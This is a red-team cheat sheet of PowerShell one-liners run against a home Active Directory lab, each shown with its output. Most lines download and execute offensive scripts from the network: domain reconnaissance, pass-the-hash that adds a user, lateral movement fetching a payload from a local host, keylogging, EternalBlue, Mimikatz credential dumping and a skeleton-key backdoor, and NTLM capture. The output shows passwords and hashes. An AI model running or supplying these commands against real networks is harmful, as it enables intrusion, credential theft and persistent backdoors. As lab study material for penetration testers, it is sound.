Quick PS wins

The following is a dump from me running PS one liners in my LAB, I wanted to add this page just to show what results should be expected from such commands.

@myexploit2600

———-

See who is connected to a central file server (DC) You can run this as a standard domain user to see the location of other users.

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/darkoperator/Veil-PowerView/master/PowerView/functions/Get-NetSessions.ps1'); Get-NetSessions -HostName WIN-O9LVH0D7KUN"

sesi10_cname sesi10_username sesi10_time
------------ --------------- -----------
\\192.168.1.11 user9 409
\\192.168.1.10 user6 159

———-

Gets a list of all current users in a specified local group

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/240711712e014f90b9e7d4f7e97f44c36cac65cf/powerview.ps1');Get-NetLocalGroup -HostName LAB22.server1.hacklab.local"

Server : LAB22.server1.hacklab.local
IsGroup : False
AccountName : LAB22/Administrator
Disabled : False
SID : S-1-5-21--711273148-1414552638--1372295448-500

Server : LAB22.server1.hacklab.local
IsGroup : False
AccountName : LAB22/IEUser
Disabled : False
SID : S-1-5-21--711273148-1414552638--1372295448-1000

Server : LAB22.server1.hacklab.local
IsGroup : False
AccountName : LAB22/sshd_server
Disabled : False
SID : S-1-5-21--711273148-1414552638--1372295448-1002

———-

See users group

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-NetGroup -UserName user1"

SERVER1\Denied RODC Password Replication Group
SERVER1\Domain Admins
SERVER1\Domain Users

———-

PTH

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-SMBExec.ps1');Invoke-SMBExec -Target 192.168.1.11 -Domain WORKGROUP -Username IEUser -Hash fc525c9683e8fe067095ba2ddc971889 -Command 'net user SMBExec Winter2017 /add'"

———-

Retrieves all computers from Active Directory and searches and returns the members of the Local Admins group

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2/master/Modules/Get-LocAdm.ps1');Get-LocAdm"

———-

lateral movement

https://raw.githubusercontent.com/EmpireProject/Empire/73358262acc8ed3c34ffc87fa593655295b81434/data/module_source/lateral_movement/Invoke-ExecuteMSBuild.ps1

C:> powershell.exe -nop -exec bypass
C:\> Import-Module C:\Users\User3\Desktop\Test\Invoke-ExecuteMSBuild.ps1

C:\> Invoke-ExecuteMSBuild -ComputerName 'LAB1.server1.hacklab.local' -Command "IEX (New-Object net.webclient).DownloadString('http://192.168.1.6/payload.txt')"

———-

Any user can run the below comnmand to see local admins

PS C:\Users\user4> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-NetLocalGroup -ComputerName WIN-O9LVH0D7KUN"

Name Value
---- -----
IsDomain True
Type LocalUser
IsGroup False
AccountName SERVER1\Administrator
ComputerName WIN-O9LVH0D7KUN
SID S-1-5-21-2697380906-1103735541-565548376-500

IsDomain True
Type LocalUser
IsGroup True
AccountName SERVER1\Enterprise Admins
ComputerName WIN-O9LVH0D7KUN

———-

Get the DC names

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-NetDomainController"

Forest : server1.hacklab.local
CurrentTime : 4/19/2005 12:05:18 PM
HighestCommittedUsn : 118827
OSVersion : Windows Server 2008 R2 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : server1.hacklab.local
IPAddress : 192.168.1.200
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : WIN-O9LVH0D7KUN.server1.hacklab.local

———-

List all machine names

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-NetComputer -FullData | Get-NameField"

WIN-O9LVH0D7KUN.server1.hacklab.local
Win7-Lab2.server1.hacklab.local
LAB2.server1.hacklab.local
LAB1.server1.hacklab.local
EXCHANGE-2013.server1.hacklab.local

———-

This is cool ACL

https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/

To create a user without DA but rights to change passwords, under Active Directory Users and Computers / right click on the domain and select Delegate Control / Next / Add / Add user or group / tick on the task to delegate.

Removing Delegated Permissions in AD – https://blog.netwrix.com/2016/10/27/detecting-delegated-permissions-in-active-directory/

Users and Computers, press the View menu and make sure ‘Advanced Features’ is ticked.

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-ACLScanner"

The results show any user that has extended rights, think helpdek

ObjectDN : CN=user6,CN=Users,DC=server1,DC=hacklab,DC=local
ObjectSID : S-1-5-21-2697380906-1103735541-565548376-1108
IdentitySID : S-1-5-21-2697380906-1103735541-565548376-1108
ActiveDirectoryRights : ExtendedRight
InheritanceType : All
ObjectType : 00299570-246d-11d0-a768-00aa006e0529
InheritedObjectType : bf967aba-0de6-11d0-a285-00aa003049e2
ObjectFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
AccessControlType : Allow
IdentityReference : SERVER1\user6
IsInherited : True
InheritanceFlags : ContainerInherit
PropagationFlags : None

———-

Searches user object fields for a given word (default *pass*). Default field being searched is ‘description’.

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-UserField"

samaccountname description
-------------- -----------
user4 Passw0rd!

———-

Find out when a user accounts were last used

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-UserProperty -Properties ssn,lastlogon,locati
on"

name ssn lastlogon location
---- --- --------- --------
Administrator 4/17/2018 11:45:36 AM
Guest 1/1/1601 12:00:00 AM
krbtgt 1/1/1601 12:00:00 AM
user1 4/17/2018 2:06:40 PM
user2 4/17/2018 3:56:01 PM
user3 4/17/2018 12:45:19 PM
user4 4/17/2018 12:42:03 PM

———-

PS net user command

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-NetUser user2"

adspath : LDAP://CN=user2,CN=Users,DC=server1,DC=hacklab,DC=local
objectsid : S-1-5-21-2697380906-1103735541-565548376-1104
samaccounttype : 805306368
primarygroupid : 513
instancetype : 4
badpasswordtime : 4/16/2018 4:27:31 PM
memberof : CN=Remote Desktop Users,CN=Builtin,DC=server1,DC=hacklab,DC=local
whenchanged : 4/10/2018 12:41:49 PM
objectclass : {top, person, organizationalPerson, user}
useraccountcontrol : 512
countrycode : 0
distinguishedname : CN=user2,CN=Users,DC=server1,DC=hacklab,DC=local
logoncount : 45

———-

Find out if your account has local admin rights


powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-CheckLocalAdminAccess"

ComputerName IsAdmin
------------ -------
localhost True

———-

Find if your account has local admin access on any remote machine

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-LocalAdminAccess"

WIN-O9LVH0D7KUN.server1.hacklab.local
LAB1.server1.hacklab.local

———-

See whats copied in the clipboard

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1');Get-ClipboardContents"
=== Get-ClipboardContents Starting at 10/04/2018:15:43:37:75 ===

=== 10/04/2018:15:43:37:78 ===

this is a test the password is this is the second test

———

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-Keystrokes.ps1');Get-Keystrokes | out-file -Encoding ASCII kerb-Hash1.txt"

PS C:\Users\user1\Desktop> dir

Directory: C:\Users\user1\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 23/03/2018 09:54 CTF_PCAP
-a--- 10/04/2018 15:26 162 kerb-Hash1.txt
-a--- 22/03/2018 16:31 430 Local Area Connection - Shortcut.lnk
-a--- 22/03/2018 12:17 1786 Wireshark.lnk

PS C:\Users\user1\Desktop> type kerb-Hash1.txt

Untitled - Notepad - 10/04/2018:15:25:57:03
t
h
i
s
[SpaceBar]
i
s
[SpaceBar]
t
h
e
[SpaceBar]
s
e
o
n
d
[SpaceBar]
t
e
s
t
[Enter]

———-

MS17-010

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/exploitation/Exploit-EternalBlue.ps1');Invoke-EternalBlue -Target 127.0.0.1 -InitialGrooms 12 -MaxAttempts 12 -Shellcode @(0x90,0x90,0xC3)"

VERBOSE: Connecting to target for activities
VERBOSE: Connection established for exploitation.
VERBOSE: all but last fragment of exploit packet
VERBOSE: Running final exploit packet
VERBOSE: socket error, exploit may fail
VERBOSE: SMB code: 00-00
VERBOSE: Send the payload with the grooms
VERBOSE: Connecting to target for activities
VERBOSE: Connection established for exploitation.
VERBOSE: all but last fragment of exploit packet
VERBOSE: Running final exploit packet
VERBOSE: socket error, exploit may fail
VERBOSE: SMB code: 00-00
VERBOSE: Send the payload with the grooms
VERBOSE: Connecting to target for activities
VERBOSE: Connection established for exploitati

———-

Skeleton Key – Has to be run in a PS session with DA rights. Back doors every user with mimikatz as the password. This runs in memory, so following a reboot of the DC the shadow password of mimikatz is cleard, also the original password is not affected and can be used at the same time.

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command misc::skeleton"

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke Mimikatz.ps1');Invoke-Mimikatz -Command misc::skeleton"
Hostname: WIN-O9LVH0D7KUN.server1.hacklab.local / S-1-5-21-2697380906-1103735541-565548376

.#####. mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(powershell) # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK

———-

UserHunter – needs to be local admin on the boxes or DA

Finds machines on the local domain where domain admins are logged into and checks if the current user has local administrator access.

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-UserHunter -CheckAccess"

UserDomain : server1.hacklab.local
UserName : Administrator
ComputerName : WIN-O9LVH0D7KUN.server1.hacklab.local
IP : {192.168.1.200, 192.168.56.200}
SessionFrom : [fe80::f86b:aab8:392c:7ddb]
LocalAdmin : False

Multi-threaded user hunting, replaces Invoke-UserHunterThreaded.

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-UserHunter -Threads 20"

UserDomain : server1.hacklab.local
UserName : Administrator
ComputerName : WIN-O9LVH0D7KUN.server1.hacklab.local
IP : {192.168.1.200, 192.168.56.200}
SessionFrom : [fe80::f86b:aab8:392c:7ddb]
LocalAdmin :

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-UserHunter -SearchForest"

UserDomain : server1.hacklab.local
UserName : Administrator
ComputerName : WIN-O9LVH0D7KUN.server1.hacklab.local
IP : {192.168.1.200, 192.168.56.200}
SessionFrom : [fe80::f86b:aab8:392c:7ddb]
LocalAdmin :

———-

Search for .xml files

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Find-InterestingFile -Path \\server1.hacklab.local\sysvol\ -Terms .xml"

FullName : \\server1.hacklab.local\sysvol\server1.hacklab.local\Policies\groups.xml
Owner : BUILTIN\Administrators
LastAccessTime : 4/6/2018 1:02:33 PM
LastWriteTime : 4/6/2018 1:02:28 PM
CreationTime : 4/6/2018 1:02:33 PM
Length : 4

———-

Check if have local admin access on a defined host.

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-CheckLocalAdminAccess -ComputerName 'WIN-O9LVH0D7KUN'"

False

———-

Returns active shares on the defined host

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Get-NetShare -ComputerName WIN-O9LVH0D7KUN"

shi1_netname shi1_type shi1_remark

ADMIN$ 2147483648 Remote Admin
C$ 2147483648 Default share
IPC$ 2147483651 Remote IPC
NETLOGON 0 Logon server share
SYSVOL 0 Logon server share

———-

List file servers

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Get-NetFileServer"

———-

Return a list of domain admins

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Get-NetGroupMember"

GroupDomain : server1.hacklab.local
GroupName : Domain Admins
MemberDomain : server1.hacklab.local
MemberName : AV_Service
MemberSid : S-1-5-21-2697380906-1103735541-565548376-1112
IsGroup : False
MemberDN : CN=AV_Service AV.,CN=Users,DC=server1,DC=hacklab,DC=local

GroupDomain : server1.hacklab.local
GroupName : Domain Admins
MemberDomain : server1.hacklab.local
MemberName : user1
MemberSid : S-1-5-21-2697380906-1103735541-565548376-1103
IsGroup : False
MemberDN : CN=user1,CN=Users,DC=server1,DC=hacklab,DC=local

GroupDomain : server1.hacklab.local
GroupName : Domain Admins
MemberDomain : server1.hacklab.local
MemberName : Administrator
MemberSid : S-1-5-21-2697380906-1103735541-565548376-500
IsGroup : False
MemberDN : CN=Administrator,CN=Users,DC=server1,DC=hacklab,DC=local

———-

Look up net groups

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Get-NetGroup -GroupName *admin*"

Administrators
Schema Admins
Enterprise Admins
Domain Admins
DnsAdmins

———-

Inveigh – Responder for PS

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Invoke-Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -FileOutput Y"

Inveigh -ConsoleOutput Y -FileOutput Y"
Inveigh 1.3.1 started at 2018-04-05T13:29:29
Elevated Privilege Mode = Disabled
Primary IP Address = 192.168.1.10
LLMNR/mDNS/NBNS Spoofer IP Address = 192.168.1.10
WARNING: LLMNR Spoofer Disabled Due To In Use Port 5355
mDNS Spoofer = Disabled
NBNS Spoofer For Types 00,20 = Enabled
NBNS TTL = 165 Seconds
SMB Capture = Disabled
HTTP Capture = Enabled
HTTPS Capture = Disabled
HTTP/HTTPS Authentication = NTLM
WPAD Authentication = NTLM
WPAD NTLM Authentication Ignore List = Firefox
HTTP Reset Delay List = Firefox
HTTP Reset Delay Timeout = 30 Seconds
WPAD Default Response = Enabled
Machine Account Capture = Disabled
Real Time Console Output = Enabled
Real Time File Output = Enabled
Output Directory = C:\Users\User4
WARNING: Run Stop-Inveigh to stop Inveigh
Press any key to stop real time console output
2018-04-05T13:29:35 - HTTP request for received from 192.168.1.11
2018-04-05T13:29:35 - HTTP host header 192.168.1.10 received from 192.168.1.11
2018-04-05T13:29:35 - HTTP user agent received from 192.168.1.11:
Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
2018-04-05T13:29:35 - HTTP NTLMv2 challenge/response captured from 192.168.1.11(IEWIN7):
test::IEWIN7:1F2EA9383A5E38E7:321618C24ABBA7469C6A99F84549F979:010100000000000056A902C2D9CCD301A3C43FF7CF0534A400000000020006004C00410042000100100048004F00530054004E0041004D004500040012006C00610062002E006C006F00630061006C000300240068006F00730074006E0061006D0065002E006C00610062002E006C006F0063006100
6C00050012006C00610062002E006C006F00630061006C000700080056A902C2D9CCD301060004000600000008003000300000000000000000000000003000003E8E3D13332F4B20E85F61CC9B757372FB3FD4EFBE0A96E7F11A2378563630700A001000000000000000000000000000000000000900220048005400540050002F003100390032002E003100360038002E0031002E0
031003000000000000000000000000000

———-

Hunt out MS08-067

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/misc/powerview.ps1'); Invoke-FindVulnSystems -Ping"

———-

Find Computer version – PS smb version

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/misc/powerview.ps1'); Get-NetComputers"

WIN-O9LVH0D7KUN.server1.hacklab.local
Win7-Lab2.server1.hacklab.local
LAB2.server1.hacklab.local
LAB1.server1.hacklab.local
EXCHANGE-2013.server1.hacklab.local

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/misc/powerview.ps1'); Get-NetComputers -OperatingSystem *xp*"

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/misc/powerview.ps1'); Get-NetComputers -OperatingSystem *2008*"

WIN-O9LVH0D7KUN.server1.hacklab.local
EXCHANGE-2013.server1.hacklab.local

———-

Download and Execute BloodHound

powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1’); Get-BloodHoundData”

———-

Mimikatz – Dump creds from a local machine

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Feb 16 2015 22:17:52)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 15 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 971431 (00000000:000ed2a7)
Session : Interactive from 1
User Name : User1
Domain : SERVER1
SID : S-1-5-21-2697380906-1103735541-565548376-1103
msv :
[00000003] Primary
* Username : user1
* Domain : SERVER1
* NTLM : fc525c9683e8fe067095ba2ddc971889
* SHA1 : e53d7244aa8727f5789b01d8959141960aad5d22
[00010000] CredentialKeys
* NTLM : fc525c9683e8fe067095ba2ddc971889
* SHA1 : e53d7244aa8727f5789b01d8959141960aad5d22
tspkg :
wdigest :
* Username : user1
* Domain : SERVER1
* Password : Passw0rd!

———

See all users logged on to a machine and list their shares

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/darkoperator/Veil-PowerView/master/PowerView/functions/Invoke-Netview.ps1'); Invoke-Netview "
Running Netview with delay of 0
[+] Domain: server1.hacklab.local
[*] Querying domain server1.hacklab.local for hosts...

[*] Total number of hosts: 4

[+] Domain Controller: WIN-O9LVH0D7KUN.server1.hacklab.local

[+] Server: WIN-O9LVH0D7KUN.server1.hacklab.local
[+] IP: 192.168.1.200 192.168.56.200
[+] WIN-O9LVH0D7KUN.server1.hacklab.local - Logged-on - SERVER1\\Administrator
[+] WIN-O9LVH0D7KUN.server1.hacklab.local - Share: ADMIN$ : Remote Admin
[+] WIN-O9LVH0D7KUN.server1.hacklab.local - Share: C$ : Default share
[+] WIN-O9LVH0D7KUN.server1.hacklab.local - Share: IPC$ : Remote IPC
[+] WIN-O9LVH0D7KUN.server1.hacklab.local - Share: NETLOGON : Logon server share
[+] WIN-O9LVH0D7KUN.server1.hacklab.local - Share: SYSVOL : Logon server share

[+] Server: Win7-Lab2.server1.hacklab.local
[+] IP: 192.168.1.6

[+] Server: LAB2.server1.hacklab.local
[+] IP: 192.168.1.5